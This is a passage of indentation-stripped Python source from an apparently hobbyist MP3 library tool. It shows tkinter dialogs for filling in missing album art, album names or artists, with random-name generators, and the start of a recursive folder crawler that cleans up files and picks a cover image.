class zat:
canva=None
canC='#000099' # zat.canC
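# "Done" button callback: close the dialog without changing taffy.dataToReturn.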
def quitt():
roota.destroy()
acv = tkinter.Button(roota,text ="Done",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',command=quitt, anchor='c',font=('Helvetica', 14, 'bold'))
acv.pack()
acv.place(bordermode=OUTSIDE, height=50, width=300,relx=0.5, rely=1.0, anchor=SW)
if issue=='cover':
msa = Label(roota, text="Missing Album Art",font=('Helvetica', 13, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',anchor='center')
msa.place(bordermode=OUTSIDE, height=27, width=300,relx=0.0, rely=0.0, anchor=NW)
msa3 = Label(roota, text="Album Information",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',font=('Helvetica', 13, 'bold'),anchor='center')
msa3.place(bordermode=OUTSIDE, height=27, width=300,relx=1.0, rely=0.0, anchor=NE)
zat.canva=tkinter.Canvas(roota, relief=SUNKEN, height=300, width=300,bg=zat.canC,highlightthickness=1, highlightbackground="cyan")
zat.canva.pack()
zat.canva.place(bordermode=OUTSIDE,height=300,width=300,relx=0,rely=0.056,anchor=NW)
msa4 = Label(roota, relief=SUNKEN,text="Please Select Album Art in JPG Format.",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',font=('Helvetica', 9, 'bold'),anchor='w')
msa4.place(bordermode=OUTSIDE, height=26, width=300,relx=0.0, rely=0.84, anchor=W)
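# "Open Cover Selector" callback: ask for a JPG/JPEG file and store its path in taffy.dataToReturn.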
def upd():
fbi=str(browseFile())
roota.lift()
if not os.path.isfile(fbi):
    msa4.config(text='Must Choose JPG/JPEG Image.')
    return
if not fbi.lower().endswith(('.jpg', '.jpeg')):
    msa4.config(text='Must Choose JPG/JPEG Image..')
    return
taffy.dataToReturn=str(fbi)
roota.destroy()
return
'''
try:
zat.canva.destroy()
image2 = Image.open(fbi)
size = 300, 300
image2.thumbnail(size,Image.ANTIALIAS)
photo2 = ImageTk.PhotoImage(image2)
zat.canva=tkinter.Canvas(roota, height=300, width=300,bg=zat.canC,highlightthickness=1, highlightbackground="cyan")
zat.canva.pack()
zat.canva.place(bordermode=OUTSIDE,height=300,width=300,relx=0,rely=0.06,anchor=NW)
labelh = Label(zat.canva,bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',image=photo2)
labelh.image = photo2
labelh.place(bordermode=OUTSIDE,relx=0,rely=0,width=302,height=302)
flip=fbi.split('\\')
flip=flip[-1]
flip=fbi.split('/')
flip=flip[-1]
msa4.config(text=str(flip))
taffy.dataToReturn=str(fbi)
except:
try:
zat.canva.destroy()
except:
pass
acv.config(text='Must Choose JPG/JPEG Image...')
zat.canva=tkinter.Canvas(roota, height=300, width=300,bg=zat.canC,highlightthickness=1, highlightbackground="cyan")
zat.canva.pack()
zat.canva.place(bordermode=OUTSIDE,height=300,width=300,relx=0,rely=0.06,anchor=NW)
'''
a = tkinter.Button(roota,text ="Open Cover Selector",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',command=upd, anchor='c',font=('Helvetica', 14, 'bold'))
a.pack()
a.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=1.0, anchor=SW)
donna=400
red = tkinter.Text(roota,bg='#000099',fg='#00ffff',font=('Helvetica', 12,'bold'))
red.pack()
red.place(bordermode=OUTSIDE, height=325, width=300,relx=1, rely=0.060, anchor=NE)
cod=True
fix=True
taft=''
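# 'available' is expected to hold the album name, then the artist, then the track filenames.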
for t in available:
if cod:
cod=False
taft+='Album: '+t+'\n'
else:
if fix:
taft+='Artist: '+t+'\n'
taft+='__________________Filenames Below\n'
fix=False
else:
taft+=t+'\n'
red.insert("1.0", taft)
red.config(state=DISABLED)
else:
val='Missing Album '
if issue=='name':
val+='Name'
else:
val+='Artist'
msa = Label(roota, text=val,font=('Helvetica', 13, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',anchor='center')
msa.place(bordermode=OUTSIDE, height=27, width=300,relx=0.0, rely=0.0, anchor=NW)
msa3 = Label(roota, text="Album Information",bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099',font=('Helvetica', 13, 'bold'),anchor='center')
msa3.place(bordermode=OUTSIDE, height=27, width=300,relx=1.0, rely=0.0, anchor=NE)
def leaveBlank():
taffy.dataToReturn=None
roota.destroy()
return
a = tkinter.Button(roota,text ="Leave Blank",command=leaveBlank, anchor='c',font=('Helvetica', 14, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099')
a.pack()
a.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=1.0, anchor=SW)
donna=400
red = tkinter.Text(roota,bg='#000099',fg='#00ffff',font=('Helvetica', 12,'bold'))
red.pack()
red.place(bordermode=OUTSIDE, height=325, width=300,relx=1, rely=0.060, anchor=NE)
fix=True
taft=''
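# Here 'available' holds the one known field (artist or album) followed by the track filenames.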
for t in available:
if fix:
if issue=='name':
taft+='Artist: '
else:
taft+='Album: '
taft+=t+'\n'+'__________________Filenames Below\n'
fix=False
else:
taft+=t+'\n'
red.insert("1.0", taft)
red.config(state=DISABLED)
class jig:
fig=True
a=True
red2 = tkinter.Text(roota,wrap=WORD,font=('Helvetica', 12),bg='#b3b3ff',fg='black')
red2.pack()
red2.place(bordermode=OUTSIDE, height=230, width=300,relx=0, rely=0.062, anchor=NW)
dell='Type '
if issue=='name':
dell+='Album Name Here'
else:
dell+='Artist Name Here'
red2.insert('1.0',dell)
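# Clear the placeholder text from the entry box.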
def clara():
red2.delete('1.0',END)
jig.fig=False
if issue=='name':
jig.a=True # Missing album name: generate a random album title.
else:
jig.a=False # Missing artist: generate a random artist name.
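# Fill the entry box with a randomly generated album title or artist name.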
def randoM():
clara()
temp=''
if jig.a: # Gen Album Name
A=['Analyse', 'Approach', 'Area', 'Assess', 'Assume', 'Authority', 'Available', 'Benefit', 'Concept', 'Consist', 'Constitute', 'Context', 'Contract', 'Create', 'Data', 'Define', 'Derive', 'Distribute', 'Economy', 'Environment', 'Establish', 'Estimate', 'Evident', 'Export', 'Factor', 'Finance', 'Formula', 'Function', 'Identify', 'Income', 'Indicate', 'Individual', 'Interpret', 'Involve', 'Issue', 'Labour', 'Legal', 'Legislate', 'Major', 'Method', 'Occur', 'Percent', 'Period', 'Policy', 'Principle', 'Proceed', 'Process', 'Require', 'Research', 'Respond', 'Role', 'Section', 'Sector', 'Significant', 'Similar', 'Source', 'Specific', 'Structure', 'Theory', 'Vary', 'Achieve', 'Acquire', 'Administrate', 'Affect', 'Appropriate', 'Aspect', 'Assist', 'Category', 'Chapter', 'Commission', 'Community', 'Complex', 'Compute', 'Conclude', 'Conduct', 'Consequent', 'Construct', 'Consume', 'Credit', 'Culture', 'Design', 'Distinct', 'Element', 'Equate', 'Evaluate', 'Feature', 'Final', 'Focus', 'Impact', 'Injure', 'Institute', 'Invest', 'Item', 'Journal', 'Maintain', 'Normal', 'Obtain', 'Participate', 'Perceive', 'Positive', 'Potential', 'Previous', 'Primary', 'Purchase', 'Range', 'Region', 'Regulate', 'Relevant', 'Reside', 'Resource', 'Restrict', 'Secure', 'Seek', 'Select', 'Site', 'Strategy', 'Survey', 'Text', 'Tradition', 'Transfer', 'Alternative', 'Circumstance', 'Comment', 'Compensate', 'Component', 'Consent', 'Considerable', 'Constant', 'Constrain', 'Contribute', 'Convene', 'Coordinate', 'Core', 'Corporate', 'Correspond', 'Criteria', 'Deduce', 'Demonstrate', 'Document', 'Dominate', 'Emphasis', 'Ensure', 'Exclude', 'Framework', 'Fund', 'Illustrate', 'Immigrate', 'Imply', 'Initial', 'Instance', 'Interact', 'Justify', 'Layer', 'Link', 'Locate', 'Maximise', 'Minor', 'Negate', 'Outcome', 'Partner', 'Philosophy', 'Physical', 'Proportion', 'Publish', 'React', 'Register', 'Rely', 'Remove', 'Scheme', 'Sequence', 'Sex', 'Shift', 'Specify', 'Sufficient', 'Task', 'Technical', 'Technique', 'Technology', 'Valid', 'Volume', 'Access', 'Adequate', 'Annual', 'Apparent', 'Approximate', 'Attitude', 'Attribute', 'Civil', 'Code', 'Commit', 'Communicate', 'Concentrate', 'Confer', 'Contrast', 'Cycle', 'Debate', 'Despite', 'Dimension', 'Domestic', 'Emerge', 'Error', 'Ethnic', 'Goal', 'Grant', 'Hence', 'Hypothesis', 'Implement', 'Implicate', 'Impose', 'Integrate', 'Internal', 'Investigate', 'Job', 'Label', 'Mechanism', 'Obvious', 'Occupy', 'Option', 'Output', 'Overall', 'Parallel', 'Parameter', 'Phase', 'Predict', 'Principal', 'Prior', 'Professional', 'Project', 'Promote', 'Regime', 'Resolve', 'Retain', 'Series', 'Statistic', 'Status', 'Stress', 'Subsequent', 'Sum', 'Summary', 'Undertake', 'Academy', 'Adjust', 'Alter', 'Amend', 'Aware', 'Capacity', 'Challenge', 'Clause', 'Compound', 'Conflict', 'Consult', 'Contact', 'Decline', 'Discrete', 'Draft', 'Enable', 'Energy', 'Enforce', 'Entity', 'Equivalent', 'Evolve', 'Expand', 'Expose', 'External', 'Facilitate', 'Fundamental', 'Generate', 'Generation', 'Image', 'Liberal', 'Licence', 'Logic', 'Margin', 'Medical', 'Mental', 'Modify', 'Monitor', 'Network', 'Notion', 'Objective', 'Orient', 'Perspective', 'Precise', 'Prime', 'Psychology', 'Pursue', 'Ratio', 'Reject', 'Revenue', 'Stable', 'Style', 'Substitute', 'Sustain', 'Symbol', 'Target', 'Transit', 'Trend', 'Version', 'Welfare', 'Whereas', 'Abstract', 'Accurate', 'Acknowledge', 'Aggregate', 'Allocate', 'Assign', 'Attach', 'Author', 'Bond', 'Brief', 'Capable', 'Cite', 'Cooperate', 'Discriminate', 'Display', 'Diverse', 'Domain', 'Edit', 
'Enhance', 'Estate', 'Exceed', 'Expert', 'Explicit', 'Federal', 'Fee', 'Flexible', 'Furthermore', 'Gender', 'Ignorant', 'Incentive', 'Incidence', 'Incorporate', 'Index', 'Inhibit', 'Initiate', 'Input', 'Instruct', 'Intelligent', 'Interval', 'Lecture', 'Migrate', 'Minimum', 'Ministry', 'Motive', 'Neutral', 'Nevertheless', 'Overseas', 'Precede', 'Presume', 'Rational', 'Recover', 'Reveal', 'Scope', 'Subsidy', 'Tape', 'Trace', 'Transform', 'Transport', 'Underlie', 'Utilise', 'Adapt', 'Adult', 'Advocate', 'Aid', 'Channel', 'Chemical', 'Classic', 'Comprehensive', 'Comprise', 'Confirm', 'Contrary', 'Convert', 'Couple', 'Decade', 'Definite', 'Deny', 'Differentiate', 'Dispose', 'Dynamic', 'Eliminate', 'Empirical', 'Equip', 'Extract', 'File', 'Finite', 'Foundation', 'Globe', 'Grade', 'Guarantee', 'Hierarchy', 'Identical', 'Ideology', 'Infer', 'Innovate', 'Insert', 'Intervene', 'Isolate', 'Media', 'Mode', 'Paradigm', 'Phenomenon', 'Priority', 'Prohibit', 'Publication', 'Quote', 'Release', 'Reverse', 'Simulate', 'Sole', 'Somewhat', 'Submit', 'Successor', 'Survive', 'Thesis', 'Topic', 'Transmit', 'Ultimate', 'Unique', 'Visible', 'Voluntary', 'Abandon', 'Accompany', 'Accumulate', 'Ambiguous', 'Append', 'Appreciate', 'Arbitrary', 'Automate', 'Bias', 'Chart', 'Clarify', 'Commodity', 'Complement', 'Conform', 'Contemporary', 'Contradict', 'Crucial', 'Currency', 'Denote', 'Detect', 'Deviate', 'Displace', 'Drama', 'Eventual', 'Exhibit', 'Exploit', 'Fluctuate', 'Guideline', 'Highlight', 'Implicit', 'Induce', 'Inevitable', 'Infrastructure', 'Inspect', 'Intense', 'Manipulate', 'Minimise', 'Nuclear', 'Offset', 'Paragraph', 'Plus', 'Practitioner', 'Predominant', 'Prospect', 'Radical', 'Random', 'Reinforce', 'Restore', 'Revise', 'Schedule', 'Tense', 'Terminate', 'Theme', 'Thereby', 'Uniform', 'Vehicle', 'Via', 'Virtual', 'Visual', 'Widespread', 'Accommodate', 'Analogy', 'Anticipate', 'Assure', 'Attain', 'Behalf', 'Bulk', 'Cease', 'Coherent', 'Coincide', 'Commence', 'Compatible', 'Concurrent', 'Confine', 'Controversy', 'Converse', 'Device', 'Devote', 'Diminish', 'Distort', 'Duration', 'Erode', 'Ethic', 'Format', 'Found', 'Inherent', 'Insight', 'Integral', 'Intermediate', 'Manual', 'Mature', 'Mediate', 'Medium', 'Military', 'Minimal', 'Mutual', 'Norm', 'Overlap', 'Passive', 'Portion', 'Preliminary', 'Protocol', 'Qualitative', 'Refine', 'Relax', 'Restrain', 'Revolution', 'Rigid', 'Route', 'Scenario', 'Sphere', 'Subordinate', 'Supplement', 'Suspend', 'Team', 'Temporary', 'Trigger', 'Unify', 'Violate', 'Vision', 'Adjacent', 'Albeit', 'Assemble', 'Collapse', 'Colleague', 'Compile', 'Conceive', 'Convince', 'Depress', 'Encounter', 'Enormous', 'Forthcoming', 'Incline', 'Integrity', 'Intrinsic', 'Invoke', 'Levy', 'Likewise', 'Nonetheless', 'Notwithstanding', 'Odd', 'Ongoing', 'Panel', 'Persist', 'Pose', 'Reluctance', 'So-called', 'Straightforward', 'Undergo', 'Whereby']
B=['for', 'and', 'nor', 'but', 'or', 'yet', 'so']
C=['Agastopia', 'Argle-bargle', 'Bibble', 'Billingsgate', 'Blatherskite', 'Bobsy-die', 'Borborygmus', 'Bumfuzzle', 'Cabotage', 'Cacophony', 'Cattywampus', 'Collywobbles', 'Conjubilant', 'Curmudgeon', 'Doodle Sack', 'Discombobulate', 'Deipnophobia', 'Dipthong', 'Donkey Engine', 'Dragoman', 'Erf', 'Erinaceous', 'Finifugal', 'Fipple', 'Firman', 'Flummox', 'Frankenfood', 'Fudgel', 'Funambulist', 'Futz', 'Gabelle', 'Gardyloo', 'Gibberish', 'Gobbledygook', 'Groke', 'Grommet', 'Gubbins', 'Halfpace', 'Hullaballoo', 'Ill-willie', 'Impignorate', 'Jentacular', 'Kakorrhaphiophobia', 'Kerfuffle', 'Lackadaisical', 'Lamprophony', 'Lollygag', 'Macrosmatic', 'Meldrop', 'Nudiustertian', 'Obelus', 'Octothorpe', 'Oxter', 'Pauciloquent', 'Poppycock', 'Quire', 'Quomodocunquizing', 'Ragamuffin', 'Ratoon', 'Salopettes', 'Smicker', 'Snickersnee', 'Sprunt', 'Taradiddle', 'Tittynope', 'Ulotrichous', 'Valetudinarian', 'Whiffler', 'Whippersnapper', 'Widdershins', 'Woebegone', 'Winklepicker', 'Xertz', 'Yarborough', 'Zoanthropy']
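# Album titles follow the pattern: one or two academic words, a conjunction, then a rare word.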
cd=random.choice([1,2])
for t in range(cd):
temp+=random.choice(A)+' '
temp+=random.choice(B)+' '
temp+=random.choice(C)+' '
temp=temp.strip()
else: # For missing album.
A=['Michael', 'Christopher', 'Jessica', 'Matthew', 'Ashley', 'Jennifer', 'Joshua', 'Amanda', 'Daniel', 'David', 'James', 'Robert', 'John', 'Joseph', 'Andrew', 'Ryan', 'Brandon', 'Jason', 'Justin', 'Sarah', 'William', 'Jonathan', 'Stephanie', 'Brian', 'Nicole', 'Nicholas', 'Anthony', 'Heather', 'Eric', 'Elizabeth', 'Adam', 'Megan', 'Melissa', 'Kevin', 'Steven', 'Thomas', 'Timothy', 'Christina', 'Kyle', 'Rachel', 'Laura', 'Lauren', 'Amber', 'Brittany', 'Danielle', 'Richard', 'Kimberly', 'Jeffrey', 'Amy', 'Crystal', 'Michelle', 'Tiffany', 'Jeremy', 'Benjamin', 'Mark', 'Emily', 'Aaron', 'Charles', 'Rebecca', 'Jacob', 'Stephen', 'Patrick', 'Sean', 'Erin', 'Zachary', 'Jamie', 'Kelly', 'Samantha', 'Nathan', 'Sara', 'Dustin', 'Paul', 'Angela', 'Tyler', 'Scott', 'Katherine', 'Andrea', 'Gregory', 'Erica', 'Mary', 'Travis', 'Lisa', 'Kenneth', 'Bryan', 'Lindsey', 'Kristen', 'Jose', 'Alexander', 'Jesse', 'Katie', 'Lindsay', 'Shannon', 'Vanessa', 'Courtney', 'Christine', 'Alicia', 'Cody', 'Allison', 'Bradley', 'Samuel', 'Shawn', 'April', 'Derek', 'Kathryn', 'Kristin', 'Chad', 'Jenna', 'Tara', 'Maria', 'Krystal', 'Jared', 'Anna', 'Edward', 'Julie', 'Peter', 'Holly', 'Marcus', 'Kristina', 'Natalie', 'Jordan', 'Victoria', 'Jacqueline', 'Corey', 'Keith', 'Monica', 'Juan', 'Donald', 'Cassandra', 'Meghan', 'Joel', 'Shane', 'Phillip', 'Patricia', 'Brett', 'Ronald', 'Catherine', 'George', 'Antonio', 'Cynthia', 'Stacy', 'Kathleen', 'Raymond', 'Carlos', 'Brandi', 'Douglas', 'Nathaniel', 'Ian', 'Craig', 'Brandy', 'Alex', 'Valerie', 'Veronica', 'Cory', 'Whitney', 'Gary', 'Derrick', 'Philip', 'Luis', 'Diana', 'Chelsea', 'Leslie', 'Caitlin', 'Leah', 'Natasha', 'Erika', 'Casey', 'Latoya', 'Erik', 'Dana', 'Victor', 'Brent', 'Dominique', 'Frank', 'Brittney', 'Evan', 'Gabriel', 'Julia', 'Candice', 'Karen', 'Melanie', 'Adrian', 'Stacey', 'Margaret', 'Sheena', 'Wesley', 'Vincent', 'Alexandra', 'Katrina', 'Bethany', 'Nichole', 'Larry', 'Jeffery', 'Curtis', 'Carrie', 'Todd', 'Blake', 'Christian', 'Randy', 'Dennis', 'Alison', 'Trevor', 'Seth', 'Kara', 'Joanna', 'Rachael', 'Luke', 'Felicia', 'Brooke', 'Austin', 'Candace', 'Jasmine', 'Jesus', 'Alan', 'Susan', 'Sandra', 'Tracy', 'Kayla', 'Nancy', 'Tina', 'Krystle', 'Russell', 'Jeremiah', 'Carl', 'Miguel', 'Tony', 'Alexis', 'Gina', 'Jillian', 'Pamela', 'Mitchell', 'Hannah', 'Renee', 'Denise', 'Molly', 'Jerry', 'Misty', 'Mario', 'Johnathan', 'Jaclyn', 'Brenda', 'Terry', 'Lacey', 'Shaun', 'Devin', 'Heidi', 'Troy', 'Lucas', 'Desiree', 'Jorge', 'Andre', 'Morgan', 'Drew', 'Sabrina', 'Miranda', 'Alyssa', 'Alisha', 'Teresa', 'Johnny', 'Meagan', 'Allen', 'Krista', 'Marc', 'Tabitha', 'Lance', 'Ricardo', 'Martin', 'Chase', 'Theresa', 'Melinda', 'Monique', 'Tanya', 'Linda', 'Kristopher', 'Bobby', 'Caleb', 'Ashlee', 'Kelli', 'Henry', 'Garrett', 'Mallory', 'Jill', 'Jonathon', 'Kristy', 'Anne', 'Francisco', 'Danny', 'Robin', 'Lee', 'Tamara', 'Manuel', 'Meredith', 'Colleen', 'Lawrence', 'Christy', 'Ricky', 'Randall', 'Marissa', 'Ross', 'Mathew', 'Jimmy', 'Abigail', 'Kendra', 'Carolyn', 'Billy', 'Deanna', 'Jenny', 'Jon', 'Albert', 'Taylor', 'Lori', 'Rebekah', 'Cameron', 'Ebony', 'Wendy', 'Angel', 'Micheal', 'Kristi', 'Caroline', 'Colin', 'Dawn', 'Kari', 'Clayton', 'Arthur', 'Roger', 'Roberto', 'Priscilla', 'Darren', 'Kelsey', 'Clinton', 'Walter', 'Louis', 'Barbara', 'Isaac', 'Cassie', 'Grant', 'Cristina', 'Tonya', 'Rodney', 'Bridget', 'Joe', 'Cindy', 'Oscar', 'Willie', 'Maurice', 'Jaime', 'Angelica', 'Sharon', 'Julian', 'Jack', 'Jay', 'Calvin', 'Marie', 'Hector', 'Kate', 'Adrienne', 'Tasha', 
'Michele', 'Ana', 'Stefanie', 'Cara', 'Alejandro', 'Ruben', 'Gerald', 'Audrey', 'Kristine', 'Ann', 'Shana', 'Javier', 'Katelyn', 'Brianna', 'Bruce', 'Deborah', 'Claudia', 'Carla', 'Wayne', 'Roy', 'Virginia', 'Haley', 'Brendan', 'Janelle', 'Jacquelyn', 'Beth', 'Edwin', 'Dylan', 'Dominic', 'Latasha', 'Darrell', 'Geoffrey', 'Savannah', 'Reginald', 'Carly', 'Fernando', 'Ashleigh', 'Aimee', 'Regina', 'Mandy', 'Sergio', 'Rafael', 'Pedro', 'Janet', 'Kaitlin', 'Frederick', 'Cheryl', 'Autumn', 'Tyrone', 'Martha', 'Omar', 'Lydia', 'Jerome', 'Theodore', 'Abby', 'Neil', 'Shawna', 'Sierra', 'Nina', 'Tammy', 'Nikki', 'Terrance', 'Donna', 'Claire', 'Cole', 'Trisha', 'Bonnie', 'Diane', 'Summer', 'Carmen', 'Mayra', 'Jermaine', 'Eddie', 'Micah', 'Marvin', 'Levi', 'Emmanuel', 'Brad', 'Taryn', 'Toni', 'Jessie', 'Evelyn', 'Darryl', 'Ronnie', 'Joy', 'Adriana', 'Ruth', 'Mindy', 'Spencer', 'Noah', 'Raul', 'Suzanne', 'Sophia', 'Dale', 'Jodi', 'Christie', 'Raquel', 'Naomi', 'Kellie', 'Ernest', 'Jake', 'Grace', 'Tristan', 'Shanna', 'Hilary', 'Eduardo', 'Ivan', 'Hillary', 'Yolanda', 'Alberto', 'Andres', 'Olivia', 'Armando', 'Paula', 'Amelia', 'Sheila', 'Rosa', 'Robyn', 'Kurt', 'Dane', 'Glenn', 'Nicolas', 'Gloria', 'Eugene', 'Logan', 'Steve', 'Ramon', 'Bryce', 'Tommy', 'Preston', 'Keri', 'Devon', 'Alana', 'Marisa', 'Melody', 'Rose', 'Barry', 'Marco', 'Karl', 'Daisy', 'Leonard', 'Randi', 'Maggie', 'Charlotte', 'Emma', 'Terrence', 'Justine', 'Britney', 'Lacy', 'Jeanette', 'Francis', 'Tyson', 'Elise', 'Sylvia', 'Rachelle', 'Stanley', 'Debra', 'Brady', 'Charity', 'Hope', 'Melvin', 'Johanna', 'Karla', 'Jarrod', 'Charlene', 'Gabrielle', 'Cesar', 'Clifford', 'Byron', 'Terrell', 'Sonia', 'Julio', 'Stacie', 'Shelby', 'Shelly', 'Edgar', 'Roxanne', 'Dwayne', 'Kaitlyn', 'Kasey', 'Jocelyn', 'Alexandria', 'Harold', 'Esther', 'Kerri', 'Ellen', 'Abraham', 'Cedric', 'Carol', 'Katharine', 'Shauna', 'Frances', 'Antoine', 'Tabatha', 'Annie', 'Erick', 'Alissa', 'Sherry', 'Chelsey', 'Franklin', 'Branden', 'Helen', 'Traci', 'Lorenzo', 'Dean', 'Sonya', 'Briana', 'Angelina', 'Trista', 'Bianca', 'Leticia', 'Tia', 'Kristie', 'Stuart', 'Laurie', 'Harry', 'Leigh', 'Elisabeth', 'Alfredo', 'Aubrey', 'Ray', 'Arturo', 'Joey', 'Kelley', 'Max', 'Andy', 'Latisha', 'Johnathon', 'India', 'Eva', 'Ralph', 'Yvonne', 'Warren', 'Kirsten', 'Miriam', 'Kelvin', 'Lorena', 'Staci', 'Anita', 'Rene', 'Cortney', 'Orlando', 'Carissa', 'Jade', 'Camille', 'Leon', 'Paige', 'Marcos', 'Elena', 'Brianne', 'Dorothy', 'Marshall', 'Daryl', 'Colby', 'Terri', 'Gabriela', 'Brock', 'Gerardo', 'Jane', 'Nelson', 'Tamika', 'Alvin', 'Chasity', 'Trent', 'Jana', 'Enrique', 'Tracey', 'Antoinette', 'Jami', 'Earl', 'Gilbert', 'Damien', 'Janice', 'Christa', 'Tessa', 'Kirk', 'Yvette', 'Elijah', 'Howard', 'Elisa', 'Desmond', 'Clarence', 'Alfred', 'Darnell', 'Breanna', 'Kerry', 'Nickolas', 'Maureen', 'Karina', 'Roderick', 'Rochelle', 'Rhonda', 'Keisha', 'Irene', 'Ethan', 'Alice', 'Allyson', 'Hayley', 'Trenton', 'Beau', 'Elaine', 'Demetrius', 'Cecilia', 'Annette', 'Brandie', 'Katy', 'Tricia', 'Bernard', 'Wade', 'Chance', 'Bryant', 'Zachery', 'Clifton', 'Julianne', 'Angelo', 'Elyse', 'Lyndsey', 'Clarissa', 'Meaghan', 'Tanisha', 'Ernesto', 'Isaiah', 'Xavier', 'Clint', 'Jamal', 'Kathy', 'Salvador', 'Jena', 'Marisol', 'Darius', 'Guadalupe', 'Chris', 'Patrice', 'Jenifer', 'Lynn', 'Landon', 'Brenton', 'Sandy', 'Jasmin', 'Ariel', 'Sasha', 'Juanita', 'Israel', 'Ericka', 'Quentin', 'Jayme', 'Damon', 'Heath', 'Kira', 'Ruby', 'Rita', 'Tiara', 'Jackie', 'Jennie', 'Collin', 'Lakeisha', 'Kenny', 'Norman', 
'Leanne', 'Hollie', 'Destiny', 'Shelley', 'Amie', 'Callie', 'Hunter', 'Duane', 'Sally', 'Serena', 'Lesley', 'Connie', 'Dallas', 'Simon', 'Neal', 'Laurel', 'Eileen', 'Lewis', 'Bobbie', 'Faith', 'Brittani', 'Shayla', 'Eli', 'Judith', 'Terence', 'Ciara', 'Charlie', 'Alyson', 'Vernon', 'Alma', 'Quinton', 'Nora', 'Lillian', 'Leroy', 'Joyce', 'Chrystal', 'Marquita', 'Lamar', 'Ashlie', 'Kent', 'Emanuel', 'Joanne', 'Gavin', 'Yesenia', 'Perry', 'Marilyn', 'Graham', 'Constance', 'Lena', 'Allan', 'Juliana', 'Jayson', 'Shari', 'Nadia', 'Tanner', 'Isabel', 'Becky', 'Rudy', 'Blair', 'Christen', 'Rosemary', 'Marlon', 'Glen', 'Genevieve', 'Damian', 'Michaela', 'Shayna', 'Marquis', 'Fredrick', 'Celeste', 'Bret', 'Betty', 'Kurtis', 'Rickey', 'Dwight', 'Rory', 'Mia', 'Josiah', 'Norma', 'Bridgette', 'Shirley', 'Sherri', 'Noelle', 'Chantel', 'Alisa', 'Zachariah', 'Jody', 'Christin', 'Julius', 'Gordon', 'Latonya', 'Lara', 'Lucy', 'Jarrett', 'Elisha', 'Deandre', 'Audra', 'Beverly', 'Felix', 'Alejandra', 'Nolan', 'Tiffani', 'Lonnie', 'Don', 'Darlene', 'Rodolfo', 'Terra', 'Sheri', 'Iris', 'Maxwell']
cd=random.choice([2,3])
for t in range(cd):
temp+=random.choice(A)+' '
temp=temp.strip()
red2.insert('1.0',temp)
ax = tkinter.Button(roota,text ="Generate Random",command=randoM, anchor='c',font=('Helvetica', 14, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099')
ax.pack()
ax.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=0.875, anchor=SW)
ax2 = tkinter.Button(roota,text ="Clear Text Box",command=clara, anchor='c',font=('Helvetica', 14, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099')
ax2.pack()
ax2.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=0.75, anchor=SW)
def jan(k):
if jig.fig:
red2.delete('1.0', END)
jig.fig=False
red2.bind('<Button-1>',jan)
red2.bind('<Button-2>',jan)
red2.bind('<Button-3>',jan)
class aloe:
vera=True
def quitt2():
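# Grab whatever was typed into the album-name box; if it is effectively empty, warn once ('Click Again To Skip') and only return None after a second empty click.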
yum=red2.get('1.0',END)
if yum.replace(' ','').replace('\n','').replace('\t','')=='' or yum.replace(' ','').replace('\n','').replace('\t','')=='TypeAlbumNameHere':
acv.config(text='No Text: Click Again To Skip',font=('Helvetica', 13, 'bold'))
if aloe.vera==False:
taffy.dataToReturn=None
roota.destroy()
return
aloe.vera=False
else:
taffy.dataToReturn=yum.replace('\n','').replace('\t','').strip()
roota.destroy()
acv.config(command=quitt2)
roota.mainloop()
def masterLoop(path):
ram.files=0
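# Walk the folder tree rooted at path. Every folder that contains mp3s is processed: files listed in ram.FilesToDelete are removed, a cover image is located (or extracted from the mp3s), filenames are renumbered, and the ID3 tags are rewritten with eyed3. ram.files counts how many mp3s were touched.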
def crawler(path): # This will be called recursively to handle sub folders.
if ram.KillThread:
ravage()
return
if os.path.isdir(path)==False:
return
files=os.listdir(path)
if files==[]:
return
glu=False
if ram.FilesToDelete != None:
for t in files:
if t.lower() in ram.FilesToDelete:
try:
os.remove(path+'/'+t)
glu=True
except:
print('Deletion of ',path+'/'+t,' Failed!')
if glu:
files=os.listdir(path)
if files==[]:
return
dirTree.A=path
files.sort()
trx=True
mp3s=[]
covers=[]
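# Split the sorted listing into mp3s and candidate cover images (jpg/jpeg); trx stays True only when no mp3 is found, in which case this folder is skipped after recursing into its sub folders.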
for t in files:
if ram.KillThread:
ravage()
return
try:
if t.lower().endswith('.mp3'):
trx=False
mp3s.append(t)
else:
if t.lower().endswith('.jpg') or t.lower().endswith('.jpeg'):
covers.append(t)
except:
pass
if os.path.isdir(path+'/'+t):
try:
crawler(path+'/'+t) # This specifies recursive sub folder calls.
except:
pass
if trx or mp3s==[]:
return
cover=None
cola=False
if covers==[]: # This will try to extract album art from mp3s.
cola=True
else: # This will try to find cover as preferable, but use any image file as cover.
cam=True
if ram.CoversToSearchFor!=None:
for t in covers:
if t.lower() in ram.CoversToSearchFor:
cover=path+'/'+t
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
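# If no user-specified cover name matched, fall back to common filename prefixes in priority order: cover, folder, art, album, front, back. Matches other than an existing cover.* file are renamed to cover.jpg when possible.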
if cam:
for t in covers:
if t.lower().startswith('cover'):
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('folder'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('art'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
